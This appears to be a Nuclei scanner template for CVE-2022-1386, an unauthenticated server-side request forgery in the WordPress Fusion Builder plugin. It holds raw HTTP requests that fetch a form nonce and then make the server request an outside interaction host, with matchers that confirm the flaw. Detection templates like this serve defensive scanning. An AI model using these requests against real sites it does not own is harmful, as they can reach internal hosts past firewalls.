id: CVE-2022-1386 info: name: WordPress Fusion Builder < 3.6.2 - Unauthenticated SSRF author: akincibor,MantisSTS,calumjelrick severity: critical description: | The plugin, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network bypassing firewalls and access control measures. reference: - https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b - https://www.rootshellsecurity.net/rootshell-discovered-a-critical-vulnerability-in-top-wordpress-theme/ - https://theme-fusion.com/version-7-6-2-security-update/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1386 cwe-id: CWE-918 tags: cve,cve2022,wp,wordpress,ssrf,fusion,themefusion,avada requests: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: {{BaseURL}} Referer: {{RootURL}} action=fusion_form_update_view - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268 Origin: {{BaseURL}} Referer: {{RootURL}} -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="formData" email=example%40example.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva cy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data= -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="action" fusion_form_submit_form_to_url -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="fusion_form_nonce" {{fusionformnonce}} -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="form_id" 0 -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="post_id" 0 -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="field_labels" {"email":"Email address"} -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="hidden_field_names" [] -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="fusionAction" https://oast.me -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="fusionActionMethod" GET -----------------------------30259827232283860776499538268-- extractors: - type: xpath part: body_1 name: fusionformnonce attribute: value xpath: - '//*[@id="fusion-form-nonce-0"]' internal: true req-condition: true matchers-condition: and matchers: - type: word part: body_2 words: - 'Interactsh Server' - type: status status: - 200